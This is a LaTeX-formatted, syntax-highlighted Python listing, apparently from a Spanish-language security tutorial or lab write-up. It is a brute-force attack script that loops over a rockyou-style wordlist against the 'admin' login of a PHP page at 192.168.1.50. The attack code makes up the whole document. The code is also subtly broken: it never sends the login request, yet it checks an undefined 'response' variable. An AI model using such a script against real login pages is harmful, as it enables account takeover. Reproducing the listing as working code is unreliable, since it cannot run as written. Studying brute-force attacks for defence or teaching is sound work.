\begin{Verbatim}[commandchars=\\\{\}]
        \PYG{k+kn}{import}\PYG{+w}{ }\PYG{n+nn}{requests}
        \PYG{k+kn}{import}\PYG{+w}{ }\PYG{n+nn}{os}
        \PYG{k+kn}{from}\PYG{+w}{ }\PYG{n+nn}{dotenv}\PYG{+w}{ }\PYG{k+kn}{import} \PYG{n}{load\PYGZus{}dotenv}

        \PYG{n}{load\PYGZus{}dotenv}\PYG{p}{()}
        \PYG{n}{url} \PYG{o}{=} \PYG{l+s+s2}{\PYGZdq{}http://192.168.1.50/index.php\PYGZdq{}}
        \PYG{n}{username} \PYG{o}{=} \PYG{l+s+s2}{\PYGZdq{}admin\PYGZdq{}}
        \PYG{n}{password\PYGZus{}file} \PYG{o}{=} \PYG{n}{os}\PYG{o}{.}\PYG{n}{getenv}\PYG{p}{(}\PYG{l+s+s1}{\PYGZsq{}ROCKYOU\PYGZus{}PATH\PYGZsq{}}\PYG{p}{)}

        \PYG{n+nb}{print}\PYG{p}{(}\PYG{l+s+sa}{f}\PYG{l+s+s2}{\PYGZdq{}[*] Iniciando ataque de fuerza bruta sobre }\PYG{l+s+si}{\PYGZob{}}\PYG{n}{url}\PYG{l+s+si}{\PYGZcb{}}\PYG{l+s+s2}{...\PYGZdq{}}\PYG{p}{)}

        \PYG{k}{with} \PYG{n+nb}{open}\PYG{p}{(}\PYG{n}{password\PYGZus{}file}\PYG{p}{,} \PYG{l+s+s2}{\PYGZdq{}r\PYGZdq{}}\PYG{p}{)} \PYG{k}{as} \PYG{n}{f}\PYG{p}{:}
            \PYG{k}{for} \PYG{n}{line} \PYG{o+ow}{in} \PYG{n}{f}\PYG{p}{:}
                \PYG{n}{password} \PYG{o}{=} \PYG{n}{line}\PYG{o}{.}\PYG{n}{strip}\PYG{p}{()}
                \PYG{n}{data} \PYG{o}{=} \PYG{p}{\PYGZob{}}
                    \PYG{l+s+s2}{\PYGZdq{}username\PYGZdq{}}\PYG{p}{:} \PYG{n}{username}\PYG{p}{,}
                    \PYG{l+s+s2}{\PYGZdq{}password\PYGZdq{}}\PYG{p}{:} \PYG{n}{password}
                \PYG{p}{\PYGZcb{}}

                \PYG{k}{if} \PYG{l+s+s2}{\PYGZdq{}Inicio de sesión fallido\PYGZdq{}} \PYG{o+ow}{not} \PYG{o+ow}{in} \PYG{n}{response}\PYG{o}{.}\PYG{n}{text}\PYG{p}{:}
                    \PYG{n+nb}{print}\PYG{p}{(}\PYG{l+s+sa}{f}\PYG{l+s+s2}{\PYGZdq{}[+] Éxito: }\PYG{l+s+si}{\PYGZob{}}\PYG{n}{password}\PYG{l+s+si}{\PYGZcb{}}\PYG{l+s+s2}{\PYGZdq{}}\PYG{p}{)}
                    \PYG{k}{break}
\end{Verbatim}
